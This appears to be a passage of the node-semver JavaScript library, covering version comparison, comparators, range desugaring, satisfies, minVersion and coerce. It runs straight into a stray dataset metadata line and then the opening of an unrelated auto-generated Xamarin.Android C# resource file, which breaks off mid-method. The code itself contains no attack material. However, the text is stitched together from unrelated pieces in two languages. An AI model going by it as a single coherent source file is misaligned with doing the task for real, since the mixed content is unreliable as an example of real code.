function diff (version1, version2) {
  if (eq(version1, version2)) {
    return null
  }

  var v1 = parse(version1)
  var v2 = parse(version2)
  var prefix = ''
  var defaultResult
  if (v1.prerelease.length || v2.prerelease.length) {
    prefix = 'pre'
    defaultResult = 'prerelease'
  }

  var parts = ['major', 'minor', 'patch']
  for (var i = 0; i < parts.length; i++) {
    var part = parts[i]
    if (v1[part] !== v2[part]) {
      return prefix + part
    }
  }

  return defaultResult
}
exports.compareIdentifiers = compareIdentifiers

var numeric = /^[0-9]+$/

// Compare two dot-separated identifiers per SemVer precedence: purely numeric
// identifiers compare numerically, a numeric identifier sorts before an
// alphanumeric one, and alphanumeric identifiers compare in ASCII order.
function compareIdentifiers (a, b) {
  var aIsNum = numeric.test(a)
  var bIsNum = numeric.test(b)

  if (aIsNum && bIsNum) {
    a = +a
    b = +b
  }

  if (a === b) {
    return 0
  }
  if (aIsNum && !bIsNum) {
    return -1
  }
  if (bIsNum && !aIsNum) {
    return 1
  }
  return a < b ? -1 : 1
}

exports.rcompareIdentifiers = rcompareIdentifiers

// Reverse comparison, for descending identifier sorts.
function rcompareIdentifiers (a, b) {
  return compareIdentifiers(b, a)
}
exports.major = major

// Return the major component of `a` (throws if `a` is invalid).
function major (a, loose) {
  var parsed = new SemVer(a, loose)
  return parsed.major
}

exports.minor = minor

// Return the minor component of `a` (throws if `a` is invalid).
function minor (a, loose) {
  var parsed = new SemVer(a, loose)
  return parsed.minor
}

exports.patch = patch

// Return the patch component of `a` (throws if `a` is invalid).
function patch (a, loose) {
  var parsed = new SemVer(a, loose)
  return parsed.patch
}

exports.compare = compare

// Standard precedence comparison; negative/zero/positive like Array#sort.
function compare (a, b, loose) {
  var left = new SemVer(a, loose)
  var right = new SemVer(b, loose)
  return left.compare(right)
}
exports.compareLoose = compareLoose

// compare() with loose parsing enabled.
function compareLoose (a, b) {
  return compare(a, b, true)
}

exports.compareBuild = compareBuild

// Compare with build metadata as a final tie-breaker (used for sorting).
function compareBuild (a, b, loose) {
  var left = new SemVer(a, loose)
  var right = new SemVer(b, loose)
  return left.compare(right) || left.compareBuild(right)
}

exports.rcompare = rcompare

// Reverse of compare(), for descending order.
function rcompare (a, b, loose) {
  return compare(b, a, loose)
}

exports.sort = sort

// Sort ascending by semver precedence; build metadata breaks ties.
function sort (list, loose) {
  return list.sort(function (x, y) {
    return exports.compareBuild(x, y, loose)
  })
}

exports.rsort = rsort

// Sort descending by semver precedence; build metadata breaks ties.
function rsort (list, loose) {
  return list.sort(function (x, y) {
    return exports.compareBuild(y, x, loose)
  })
}
exports.gt = gt

// true when a > b
function gt (a, b, loose) {
  var order = compare(a, b, loose)
  return order > 0
}

exports.lt = lt

// true when a < b
function lt (a, b, loose) {
  var order = compare(a, b, loose)
  return order < 0
}

exports.eq = eq

// true when a and b have equal precedence
function eq (a, b, loose) {
  var order = compare(a, b, loose)
  return order === 0
}

exports.neq = neq

// true when a and b differ in precedence
function neq (a, b, loose) {
  var order = compare(a, b, loose)
  return order !== 0
}

exports.gte = gte

// true when a >= b
function gte (a, b, loose) {
  var order = compare(a, b, loose)
  return order >= 0
}

exports.lte = lte

// true when a <= b
function lte (a, b, loose) {
  var order = compare(a, b, loose)
  return order <= 0
}
exports.cmp = cmp

// Generic comparison dispatcher: evaluates `a <op> b` for any operator
// accepted in ranges. '===' and '!==' compare version strings without semver
// coercion; '' and '=' are synonyms for '=='. Throws TypeError for an
// unrecognized operator.
function cmp (a, op, b, loose) {
  switch (op) {
    case '===':
      if (typeof a === 'object') {
        a = a.version
      }
      if (typeof b === 'object') {
        b = b.version
      }
      return a === b

    case '!==':
      if (typeof a === 'object') {
        a = a.version
      }
      if (typeof b === 'object') {
        b = b.version
      }
      return a !== b

    case '':
    case '=':
    case '==':
      return eq(a, b, loose)

    case '!=':
      return neq(a, b, loose)

    case '>':
      return gt(a, b, loose)

    case '>=':
      return gte(a, b, loose)

    case '<':
      return lt(a, b, loose)

    case '<=':
      return lte(a, b, loose)

    default:
      throw new TypeError('Invalid operator: ' + op)
  }
}
exports.Comparator = Comparator
// Comparator represents a single operator+version pair (e.g. '>=1.2.3').
// Works with or without `new`; reuses an existing instance when the
// looseness matches. Throws TypeError on an unparseable comparator string.
function Comparator (comp, options) {
  if (!options || typeof options !== 'object') {
    options = {
      loose: !!options,
      includePrerelease: false
    }
  }
  if (comp instanceof Comparator) {
    if (comp.loose === !!options.loose) {
      return comp
    } else {
      comp = comp.value
    }
  }
  if (!(this instanceof Comparator)) {
    return new Comparator(comp, options)
  }
  debug('comparator', comp, options)
  this.options = options
  this.loose = !!options.loose
  this.parse(comp)
  // value is the normalized string form; '' means "matches anything".
  if (this.semver === ANY) {
    this.value = ''
  } else {
    this.value = this.operator + this.semver.version
  }
  debug('comp', this)
}
// Sentinel "version" used for comparators that match any version.
var ANY = {}
// Split a comparator string (e.g. '>=1.2.3') into this.operator and
// this.semver; a bare operator or empty string yields the ANY sentinel.
Comparator.prototype.parse = function (comp) {
  var r = this.options.loose ? re[t.COMPARATORLOOSE] : re[t.COMPARATOR]
  var m = comp.match(r)
  if (!m) {
    throw new TypeError('Invalid comparator: ' + comp)
  }
  // '=' is normalized away: '=1.2.3' behaves exactly like '1.2.3'.
  this.operator = m[1] !== undefined ? m[1] : ''
  if (this.operator === '=') {
    this.operator = ''
  }
  // if it literally is just '>' or '' then allow anything.
  if (!m[2]) {
    this.semver = ANY
  } else {
    this.semver = new SemVer(m[2], this.options.loose)
  }
}
Comparator.prototype.toString = function () {
  return this.value
}

// Test whether `version` satisfies this single comparator.
Comparator.prototype.test = function (version) {
  debug('Comparator.test', version, this.options.loose)

  // The ANY sentinel (bare operator or '') matches every version.
  if (this.semver === ANY || version === ANY) {
    return true
  }

  if (typeof version === 'string') {
    try {
      version = new SemVer(version, this.options)
    } catch (er) {
      // Unparseable version strings satisfy nothing.
      return false
    }
  }

  return cmp(version, this.operator, this.semver, this.options)
}
// Determine whether the set of versions matched by this comparator overlaps
// the set matched by `comp`.
Comparator.prototype.intersects = function (comp, options) {
  if (!(comp instanceof Comparator)) {
    throw new TypeError('a Comparator is required')
  }
  if (!options || typeof options !== 'object') {
    options = {
      loose: !!options,
      includePrerelease: false
    }
  }
  var rangeTmp
  // An empty operator means plain equality, so intersection reduces to a
  // satisfies() check of the pinned version against the other side as a range.
  // (satisfies is defined later in this file.)
  if (this.operator === '') {
    if (this.value === '') {
      return true
    }
    rangeTmp = new Range(comp.value, options)
    return satisfies(this.value, rangeTmp, options)
  } else if (comp.operator === '') {
    if (comp.value === '') {
      return true
    }
    rangeTmp = new Range(this.value, options)
    return satisfies(comp.semver, rangeTmp, options)
  }
  // Otherwise enumerate the overlap cases explicitly:
  // both point the same direction -> always overlap.
  var sameDirectionIncreasing =
    (this.operator === '>=' || this.operator === '>') &&
    (comp.operator === '>=' || comp.operator === '>')
  var sameDirectionDecreasing =
    (this.operator === '<=' || this.operator === '<') &&
    (comp.operator === '<=' || comp.operator === '<')
  // identical version with inclusive bounds on both sides -> overlap at that point.
  var sameSemVer = this.semver.version === comp.semver.version
  var differentDirectionsInclusive =
    (this.operator === '>=' || this.operator === '<=') &&
    (comp.operator === '>=' || comp.operator === '<=')
  // opposing directions overlap when the lower bound lies below the upper bound.
  var oppositeDirectionsLessThan =
    cmp(this.semver, '<', comp.semver, options) &&
    ((this.operator === '>=' || this.operator === '>') &&
    (comp.operator === '<=' || comp.operator === '<'))
  var oppositeDirectionsGreaterThan =
    cmp(this.semver, '>', comp.semver, options) &&
    ((this.operator === '<=' || this.operator === '<') &&
    (comp.operator === '>=' || comp.operator === '>'))
  return sameDirectionIncreasing || sameDirectionDecreasing ||
    (sameSemVer && differentDirectionsInclusive) ||
    oppositeDirectionsLessThan || oppositeDirectionsGreaterThan
}
exports.Range = Range
// Range represents a full range expression: a disjunction ('||') of
// comparator sets, each set being a conjunction of comparators. Works with
// or without `new`; throws TypeError when no comparator set parses.
function Range (range, options) {
  if (!options || typeof options !== 'object') {
    options = {
      loose: !!options,
      includePrerelease: false
    }
  }
  if (range instanceof Range) {
    // Reuse only when all parse-affecting options match; otherwise reparse.
    if (range.loose === !!options.loose &&
        range.includePrerelease === !!options.includePrerelease) {
      return range
    } else {
      return new Range(range.raw, options)
    }
  }
  if (range instanceof Comparator) {
    return new Range(range.value, options)
  }
  if (!(this instanceof Range)) {
    return new Range(range, options)
  }
  this.options = options
  this.loose = !!options.loose
  this.includePrerelease = !!options.includePrerelease
  // First, split based on boolean or ||
  this.raw = range
  this.set = range.split(/\s*\|\|\s*/).map(function (range) {
    return this.parseRange(range.trim())
  }, this).filter(function (c) {
    // throw out any that are not relevant for whatever reason
    return c.length
  })
  if (!this.set.length) {
    throw new TypeError('Invalid SemVer Range: ' + range)
  }
  this.format()
}
// Rebuild the canonical "a b || c d" string from the comparator sets and
// cache it on `this.range`.
Range.prototype.format = function () {
  var alternatives = this.set.map(function (comparators) {
    return comparators.join(' ').trim()
  })
  this.range = alternatives.join('||').trim()
  return this.range
}
Range.prototype.toString = function () {
  // format() keeps `this.range` up to date; reuse the cached string.
  return this.range
}
// Parse one OR-ed alternative into an array of Comparator objects. The text
// is desugared in stages (hyphen ranges, operator spacing, tilde, caret,
// x-ranges, stars) until only plain comparators remain.
Range.prototype.parseRange = function (range) {
  var loose = this.options.loose
  range = range.trim()
  // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4`
  var hr = loose ? re[t.HYPHENRANGELOOSE] : re[t.HYPHENRANGE]
  range = range.replace(hr, hyphenReplace)
  debug('hyphen replace', range)
  // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5`
  range = range.replace(re[t.COMPARATORTRIM], comparatorTrimReplace)
  debug('comparator trim', range, re[t.COMPARATORTRIM])
  // `~ 1.2.3` => `~1.2.3`
  range = range.replace(re[t.TILDETRIM], tildeTrimReplace)
  // `^ 1.2.3` => `^1.2.3`
  range = range.replace(re[t.CARETTRIM], caretTrimReplace)
  // normalize spaces
  range = range.split(/\s+/).join(' ')
  // At this point, the range is completely trimmed and
  // ready to be split into comparators.
  var compRe = loose ? re[t.COMPARATORLOOSE] : re[t.COMPARATOR]
  var set = range.split(' ').map(function (comp) {
    return parseComparator(comp, this.options)
  }, this).join(' ').split(/\s+/)
  if (this.options.loose) {
    // in loose mode, throw out any that are not valid comparators
    set = set.filter(function (comp) {
      return !!comp.match(compRe)
    })
  }
  set = set.map(function (comp) {
    return new Comparator(comp, this.options)
  }, this)
  return set
}
// True when this range and `range` can both be satisfied by some version:
// some alternative on each side must be internally satisfiable, and every
// comparator pair across the two alternatives must intersect.
Range.prototype.intersects = function (range, options) {
  if (!(range instanceof Range)) {
    throw new TypeError('a Range is required')
  }
  return this.set.some(function (thisComparators) {
    return (
      isSatisfiable(thisComparators, options) &&
      range.set.some(function (rangeComparators) {
        return (
          isSatisfiable(rangeComparators, options) &&
          thisComparators.every(function (thisComparator) {
            return rangeComparators.every(function (rangeComparator) {
              return thisComparator.intersects(rangeComparator, options)
            })
          })
        )
      })
    )
  })
}
// Determine whether at least one version could satisfy every comparator in
// the given AND-ed set, by checking that every pair of comparators intersects.
function isSatisfiable (comparators, options) {
  var pending = comparators.slice()
  var probe = pending.pop()
  while (pending.length) {
    for (var i = 0; i < pending.length; i++) {
      if (!probe.intersects(pending[i], options)) {
        return false
      }
    }
    probe = pending.pop()
  }
  return true
}
// Mostly just for testing and legacy API reasons: expose each alternative of
// the parsed range as an array of comparator strings.
exports.toComparators = toComparators
function toComparators (range, options) {
  var alternatives = new Range(range, options).set
  return alternatives.map(function (comparators) {
    var joined = comparators.map(function (c) {
      return c.value
    }).join(' ').trim()
    return joined.split(' ')
  })
}
// At this stage the expression is made of xranges, tildes, stars and plain
// gtlt comparators (hyphen ranges were already expanded). Desugar one token
// into plain comparators by running each rewrite pass in order.
function parseComparator (comp, options) {
  debug('comp', comp, options)
  var passes = [
    [replaceCarets, 'caret'],
    [replaceTildes, 'tildes'],
    [replaceXRanges, 'xrange'],
    [replaceStars, 'stars']
  ]
  for (var i = 0; i < passes.length; i++) {
    comp = passes[i][0](comp, options)
    debug(passes[i][1], comp)
  }
  return comp
}
// Is this version component a wildcard? Missing/empty values, "x"/"X" and
// "*" all count as wildcards.
function isX (id) {
  if (!id) {
    return true
  }
  return id === '*' || id.toLowerCase() === 'x'
}
// Tilde ranges pin the minor version:
//   ~, ~>            -> * (match anything)
//   ~2, ~2.x, ~>2.x  -> >=2.0.0 <3.0.0
//   ~2.0, ~2.0.x     -> >=2.0.0 <2.1.0
//   ~1.2, ~1.2.x     -> >=1.2.0 <1.3.0
//   ~1.2.3, ~>1.2.3  -> >=1.2.3 <1.3.0
//   ~1.2.0, ~>1.2.0  -> >=1.2.0 <1.3.0
function replaceTildes (comp, options) {
  var pieces = comp.trim().split(/\s+/)
  var rewritten = []
  for (var i = 0; i < pieces.length; i++) {
    rewritten.push(replaceTilde(pieces[i], options))
  }
  return rewritten.join(' ')
}
// Desugar one tilde token. Capture groups from the TILDE regex:
// M = major, m = minor, p = patch, pr = prerelease tail.
function replaceTilde (comp, options) {
  var r = options.loose ? re[t.TILDELOOSE] : re[t.TILDE]
  return comp.replace(r, function (_, M, m, p, pr) {
    debug('tilde', comp, _, M, m, p, pr)
    var ret
    if (isX(M)) {
      // "~" / "~x" places no constraint at all.
      ret = ''
    } else if (isX(m)) {
      // ~2 == >=2.0.0 <3.0.0
      ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0'
    } else if (isX(p)) {
      // ~1.2 == >=1.2.0 <1.3.0
      ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0'
    } else if (pr) {
      debug('replaceTilde pr', pr)
      // Prerelease lower bound; upper bound still excludes the next minor.
      ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
        ' <' + M + '.' + (+m + 1) + '.0'
    } else {
      // ~1.2.3 == >=1.2.3 <1.3.0
      ret = '>=' + M + '.' + m + '.' + p +
        ' <' + M + '.' + (+m + 1) + '.0'
    }
    debug('tilde return', ret)
    return ret
  })
}
// Caret ranges allow changes that keep the left-most non-zero component:
//   ^            -> * (match anything)
//   ^2, ^2.x     -> >=2.0.0 <3.0.0
//   ^2.0, ^2.0.x -> >=2.0.0 <3.0.0
//   ^1.2, ^1.2.x -> >=1.2.0 <2.0.0
//   ^1.2.3       -> >=1.2.3 <2.0.0
//   ^1.2.0       -> >=1.2.0 <2.0.0
function replaceCarets (comp, options) {
  var pieces = comp.trim().split(/\s+/)
  var rewritten = []
  for (var i = 0; i < pieces.length; i++) {
    rewritten.push(replaceCaret(pieces[i], options))
  }
  return rewritten.join(' ')
}
// Desugar one caret token. Caret permits changes that do not modify the
// left-most non-zero component, hence the special cases for major 0 and
// major.minor 0.0. Capture groups: M = major, m = minor, p = patch, pr =
// prerelease tail.
function replaceCaret (comp, options) {
  debug('caret', comp, options)
  var r = options.loose ? re[t.CARETLOOSE] : re[t.CARET]
  return comp.replace(r, function (_, M, m, p, pr) {
    debug('caret', comp, _, M, m, p, pr)
    var ret
    if (isX(M)) {
      // "^" / "^x" places no constraint at all.
      ret = ''
    } else if (isX(m)) {
      ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0'
    } else if (isX(p)) {
      // ^0.2.x pins the minor; ^1.2.x only pins the major.
      if (M === '0') {
        ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0'
      } else {
        ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0'
      }
    } else if (pr) {
      debug('replaceCaret pr', pr)
      // Same shape as below but with the prerelease kept on the lower bound.
      if (M === '0') {
        if (m === '0') {
          ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
            ' <' + M + '.' + m + '.' + (+p + 1)
        } else {
          ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
            ' <' + M + '.' + (+m + 1) + '.0'
        }
      } else {
        ret = '>=' + M + '.' + m + '.' + p + '-' + pr +
          ' <' + (+M + 1) + '.0.0'
      }
    } else {
      debug('no pr')
      // ^0.0.3 -> >=0.0.3 <0.0.4; ^0.2.3 -> >=0.2.3 <0.3.0; ^1.2.3 -> <2.0.0
      if (M === '0') {
        if (m === '0') {
          ret = '>=' + M + '.' + m + '.' + p +
            ' <' + M + '.' + m + '.' + (+p + 1)
        } else {
          ret = '>=' + M + '.' + m + '.' + p +
            ' <' + M + '.' + (+m + 1) + '.0'
        }
      } else {
        ret = '>=' + M + '.' + m + '.' + p +
          ' <' + (+M + 1) + '.0.0'
      }
    }
    debug('caret return', ret)
    return ret
  })
}
// Rewrite every whitespace-separated x-range token in the comparator string.
// Note: unlike the tilde/caret passes, the input is split without trimming.
function replaceXRanges (comp, options) {
  debug('replaceXRanges', comp, options)
  var parts = comp.split(/\s+/)
  var rewritten = []
  for (var i = 0; i < parts.length; i++) {
    rewritten.push(replaceXRange(parts[i], options))
  }
  return rewritten.join(' ')
}
// Desugar a single x-range comparator (e.g. ">1.x", "1.2.*", "=2.x") into
// explicit comparators. Capture groups: gtlt = comparison operator (may be
// empty), M/m/p = version components, pr = prerelease (recomputed below).
function replaceXRange (comp, options) {
  comp = comp.trim()
  var r = options.loose ? re[t.XRANGELOOSE] : re[t.XRANGE]
  return comp.replace(r, function (ret, gtlt, M, m, p, pr) {
    debug('xRange', comp, ret, gtlt, M, m, p, pr)
    // xM/xm/xp: is the major/minor/patch component a wildcard? Each implies
    // the ones to its right.
    var xM = isX(M)
    var xm = xM || isX(m)
    var xp = xm || isX(p)
    var anyX = xp
    if (gtlt === '=' && anyX) {
      gtlt = ''
    }
    // if we're including prereleases in the match, then we need
    // to fix this to -0, the lowest possible prerelease value
    pr = options.includePrerelease ? '-0' : ''
    if (xM) {
      if (gtlt === '>' || gtlt === '<') {
        // nothing is allowed
        ret = '<0.0.0-0'
      } else {
        // nothing is forbidden
        ret = '*'
      }
    } else if (gtlt && anyX) {
      // we know patch is an x, because we have any x at all.
      // replace X with 0
      if (xm) {
        m = 0
      }
      p = 0
      if (gtlt === '>') {
        // >1 => >=2.0.0
        // >1.2 => >=1.3.0
        // >1.2.3 => >= 1.2.4
        gtlt = '>='
        if (xm) {
          M = +M + 1
          m = 0
          p = 0
        } else {
          m = +m + 1
          p = 0
        }
      } else if (gtlt === '<=') {
        // <=0.7.x is actually <0.8.0, since any 0.7.x should
        // pass. Similarly, <=7.x is actually <8.0.0, etc.
        gtlt = '<'
        if (xm) {
          M = +M + 1
        } else {
          m = +m + 1
        }
      }
      ret = gtlt + M + '.' + m + '.' + p + pr
    } else if (xm) {
      // Bare "1" / "1.x" becomes the whole major range.
      ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr
    } else if (xp) {
      // Bare "1.2" / "1.2.x" becomes the whole minor range.
      ret = '>=' + M + '.' + m + '.0' + pr +
        ' <' + M + '.' + (+m + 1) + '.0' + pr
    }
    debug('xRange return', ret)
    return ret
  })
}
// Because * is AND-ed with everything else in the comparator,
// and '' means "any version", just remove the *s entirely.
// `options` is accepted only for signature symmetry with the other
// replace* passes; it is unused here.
function replaceStars (comp, options) {
  debug('replaceStars', comp, options)
  // Looseness is ignored here. star is always as loose as it gets!
  return comp.trim().replace(re[t.STAR], '')
}
// This function is passed to string.replace(re[t.HYPHENRANGE])
// M, m, patch, prerelease, build
// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5
// 1.2.3 - 3.4 => >=1.2.3 <3.5.0 Any 3.4.x will do
// 1.2 - 3.4 => >=1.2.0 <3.5.0
// Missing components on the `from` side default to 0 (inclusive lower bound);
// missing components on the `to` side widen the upper bound to an exclusive
// "<" on the next minor/major release.
function hyphenReplace ($0,
  from, fM, fm, fp, fpr, fb,
  to, tM, tm, tp, tpr, tb) {
  if (isX(fM)) {
    from = ''
  } else if (isX(fm)) {
    from = '>=' + fM + '.0.0'
  } else if (isX(fp)) {
    from = '>=' + fM + '.' + fm + '.0'
  } else {
    from = '>=' + from
  }
  if (isX(tM)) {
    to = ''
  } else if (isX(tm)) {
    to = '<' + (+tM + 1) + '.0.0'
  } else if (isX(tp)) {
    to = '<' + tM + '.' + (+tm + 1) + '.0'
  } else if (tpr) {
    to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr
  } else {
    to = '<=' + to
  }
  return (from + ' ' + to).trim()
}
// A version satisfies the range when ANY alternative set matches ALL of its
// comparators. Accepts a SemVer instance or a version string; unparseable
// input simply fails the test.
Range.prototype.test = function (version) {
  if (!version) {
    return false
  }
  if (typeof version === 'string') {
    try {
      version = new SemVer(version, this.options)
    } catch (er) {
      return false
    }
  }
  var options = this.options
  return this.set.some(function (comparators) {
    return testSet(comparators, version, options)
  })
}
// True when `version` satisfies every comparator of one AND-ed set, with the
// extra semver rule that a prerelease version only matches a set that
// explicitly mentions a prerelease on the same [major, minor, patch] tuple
// (unless options.includePrerelease is on).
function testSet (set, version, options) {
  for (var i = 0; i < set.length; i++) {
    if (!set[i].test(version)) {
      return false
    }
  }
  if (version.prerelease.length && !options.includePrerelease) {
    // Find the set of versions that are allowed to have prereleases
    // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0
    // That should allow `1.2.3-pr.2` to pass.
    // However, `1.2.4-alpha.notready` should NOT be allowed,
    // even though it's within the range set by the comparators.
    for (i = 0; i < set.length; i++) {
      debug(set[i].semver)
      if (set[i].semver === ANY) {
        continue
      }
      if (set[i].semver.prerelease.length > 0) {
        var allowed = set[i].semver
        if (allowed.major === version.major &&
            allowed.minor === version.minor &&
            allowed.patch === version.patch) {
          return true
        }
      }
    }
    // Version has a -pre, but it's not one of the ones we like.
    return false
  }
  return true
}
exports.satisfies = satisfies
// Does `version` fall inside `range`? An unparseable range yields false
// rather than throwing.
function satisfies (version, range, options) {
  var parsedRange
  try {
    parsedRange = new Range(range, options)
  } catch (er) {
    return false
  }
  return parsedRange.test(version)
}
exports.maxSatisfying = maxSatisfying
// Highest entry of `versions` that satisfies `range`, or null when the range
// is invalid or nothing matches. Returns the original array element, not a
// SemVer instance.
function maxSatisfying (versions, range, options) {
  var rangeObj
  try {
    rangeObj = new Range(range, options)
  } catch (er) {
    return null
  }
  var best = null
  var bestSV = null
  versions.forEach(function (v) {
    if (!rangeObj.test(v)) {
      return
    }
    // Keep the first match, then anything that compares higher.
    if (best === null || bestSV.compare(v) === -1) {
      best = v
      bestSV = new SemVer(best, options)
    }
  })
  return best
}
exports.minSatisfying = minSatisfying
// Lowest entry of `versions` that satisfies `range`, or null when the range
// is invalid or nothing matches. Returns the original array element, not a
// SemVer instance.
function minSatisfying (versions, range, options) {
  var rangeObj
  try {
    rangeObj = new Range(range, options)
  } catch (er) {
    return null
  }
  var best = null
  var bestSV = null
  versions.forEach(function (v) {
    if (!rangeObj.test(v)) {
      return
    }
    // Keep the first match, then anything that compares lower.
    if (best === null || bestSV.compare(v) === 1) {
      best = v
      bestSV = new SemVer(best, options)
    }
  })
  return best
}
exports.minVersion = minVersion
// Return the lowest SemVer that satisfies `range`, or null when the range
// excludes everything. `loose` may be a boolean or an options object (it is
// passed straight to the Range constructor).
function minVersion (range, loose) {
  range = new Range(range, loose)
  // Fast paths: the absolute minimum release / prerelease versions.
  var minver = new SemVer('0.0.0')
  if (range.test(minver)) {
    return minver
  }
  minver = new SemVer('0.0.0-0')
  if (range.test(minver)) {
    return minver
  }
  minver = null
  // Otherwise derive a candidate from each comparator's lower bound.
  for (var i = 0; i < range.set.length; ++i) {
    var comparators = range.set[i]
    comparators.forEach(function (comparator) {
      // Clone to avoid manipulating the comparator's semver object.
      var compver = new SemVer(comparator.semver.version)
      switch (comparator.operator) {
        case '>':
          // The smallest version strictly greater than X: the next patch for
          // a release version, or X with a "0" prerelease part appended.
          if (compver.prerelease.length === 0) {
            compver.patch++
          } else {
            compver.prerelease.push(0)
          }
          compver.raw = compver.format()
          /* fallthrough */
        case '':
        case '>=':
          if (!minver || gt(minver, compver)) {
            minver = compver
          }
          break
        case '<':
        case '<=':
          /* Ignore maximum versions */
          break
        /* istanbul ignore next */
        default:
          throw new Error('Unexpected operation: ' + comparator.operator)
      }
    })
  }
  // The candidate built from lower bounds must still satisfy the whole range.
  if (minver && range.test(minver)) {
    return minver
  }
  return null
}
exports.validRange = validRange
// Canonical string form of `range`, or null when it does not parse.
function validRange (range, options) {
  try {
    var parsed = new Range(range, options)
    // Return '*' instead of '' so that truthiness works.
    // This will throw if it's invalid anyway
    return parsed.range || '*'
  } catch (er) {
    return null
  }
}
// Determine if version is less than all the versions possible in the range
exports.ltr = ltr
function ltr (version, range, options) {
  // Thin wrapper over outside() with hilo = '<'.
  return outside(version, range, '<', options)
}
// Determine if version is greater than all the versions possible in the range.
exports.gtr = gtr
function gtr (version, range, options) {
  // Thin wrapper over outside() with hilo = '>'.
  return outside(version, range, '>', options)
}
exports.outside = outside
// True when `version` lies entirely outside `range` on the `hilo` side:
// hilo '>' asks "is version greater than every version the range allows?",
// hilo '<' asks "is it less than every allowed version?".
function outside (version, range, hilo, options) {
  version = new SemVer(version, options)
  range = new Range(range, options)
  // Comparison helpers are flipped per direction so the loop below can
  // always reason in "gtr" terms.
  var gtfn, ltefn, ltfn, comp, ecomp
  switch (hilo) {
    case '>':
      gtfn = gt
      ltefn = lte
      ltfn = lt
      comp = '>'
      ecomp = '>='
      break
    case '<':
      gtfn = lt
      ltefn = gte
      ltfn = gt
      comp = '<'
      ecomp = '<='
      break
    default:
      throw new TypeError('Must provide a hilo val of "<" or ">"')
  }
  // If it satisfies the range it is not outside
  if (satisfies(version, range, options)) {
    return false
  }
  // From now on, variable terms are as if we're in "gtr" mode.
  // but note that everything is flipped for the "ltr" function.
  for (var i = 0; i < range.set.length; ++i) {
    var comparators = range.set[i]
    // Track the highest and lowest comparator of this AND-ed set.
    var high = null
    var low = null
    comparators.forEach(function (comparator) {
      if (comparator.semver === ANY) {
        comparator = new Comparator('>=0.0.0')
      }
      high = high || comparator
      low = low || comparator
      if (gtfn(comparator.semver, high.semver, options)) {
        high = comparator
      } else if (ltfn(comparator.semver, low.semver, options)) {
        low = comparator
      }
    })
    // If the edge version comparator has an operator then our version
    // isn't outside it
    if (high.operator === comp || high.operator === ecomp) {
      return false
    }
    // If the lowest version comparator has an operator and our version
    // is less than it then it isn't higher than the range
    if ((!low.operator || low.operator === comp) &&
        ltefn(version, low.semver)) {
      return false
    } else if (low.operator === ecomp && ltfn(version, low.semver)) {
      return false
    }
  }
  return true
}
exports.prerelease = prerelease
// The prerelease component array of `version` (e.g. ['beta', 2]), or null
// when the version does not parse or has no prerelease part.
function prerelease (version, options) {
  var parsed = parse(version, options)
  if (parsed && parsed.prerelease.length) {
    return parsed.prerelease
  }
  return null
}
exports.intersects = intersects
// Do two ranges overlap, i.e. can some version satisfy both? `r1`/`r2` may
// be Range instances or range strings; `options` carries the loose /
// includePrerelease parse flags.
function intersects (r1, r2, options) {
  r1 = new Range(r1, options)
  r2 = new Range(r2, options)
  // Bug fix: forward `options` so the comparator-level intersection honors
  // the same flags the ranges were parsed with (previously dropped).
  return r1.intersects(r2, options)
}
exports.coerce = coerce
// Coerce an arbitrary string (or number) into a SemVer by extracting the
// first — or, with options.rtl, the right-most — version-like run of digits.
// Returns the parsed SemVer, or null when nothing coercible is found.
function coerce (version, options) {
  if (version instanceof SemVer) {
    return version
  }
  if (typeof version === 'number') {
    version = String(version)
  }
  if (typeof version !== 'string') {
    return null
  }
  options = options || {}
  var match = null
  if (!options.rtl) {
    match = version.match(re[t.COERCE])
  } else {
    // Find the right-most coercible string that does not share
    // a terminus with a more left-ward coercible string.
    // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4'
    //
    // Walk through the string checking with a /g regexp
    // Manually set the index so as to pick up overlapping matches.
    // Stop when we get a match that ends at the string end, since no
    // coercible string can be more right-ward without the same terminus.
    var next
    while ((next = re[t.COERCERTL].exec(version)) &&
      (!match || match.index + match[0].length !== version.length)
    ) {
      if (!match ||
            next.index + next[0].length !== match.index + match[0].length) {
        match = next
      }
      re[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length
    }
    // leave it in a clean state
    re[t.COERCERTL].lastIndex = -1
  }
  if (match === null) {
    return null
  }
  // Capture groups: 2 = major, 3 = minor (default 0), 4 = patch (default 0).
  return parse(match[2] +
    '.' + (match[3] || '0') +
    '.' + (match[4] || '0'), options)
}
| {
"pile_set_name": "Github"
} |
#pragma warning disable 1591
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
[assembly: global::Android.Runtime.ResourceDesignerAttribute("GalaSoft.MvvmLight.Test.Resource", IsApplication=true)]
namespace GalaSoft.MvvmLight.Test
{
	[System.CodeDom.Compiler.GeneratedCodeAttribute("Xamarin.Android.Build.Tasks", "1.0.0.0")]
	// Machine-generated Android resource ID map (see the auto-generated header
	// above) — do not hand-edit; changes are overwritten on the next build.
	public partial class Resource
	{
		static Resource()
		{
			global::Android.Runtime.ResourceIdManager.UpdateIdValues();
		}
		// Re-points the shared Xamarin.Android.NUnitLite resource IDs at this
		// assembly's aapt-generated values so the bundled test-runner UI
		// (layouts, buttons, result views) resolves at runtime.
		public static void UpdateIdValues()
		{
			global::Xamarin.Android.NUnitLite.Resource.Id.OptionHostName = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionHostName;
			global::Xamarin.Android.NUnitLite.Resource.Id.OptionPort = global::GalaSoft.MvvmLight.Test.Resource.Id.OptionPort;
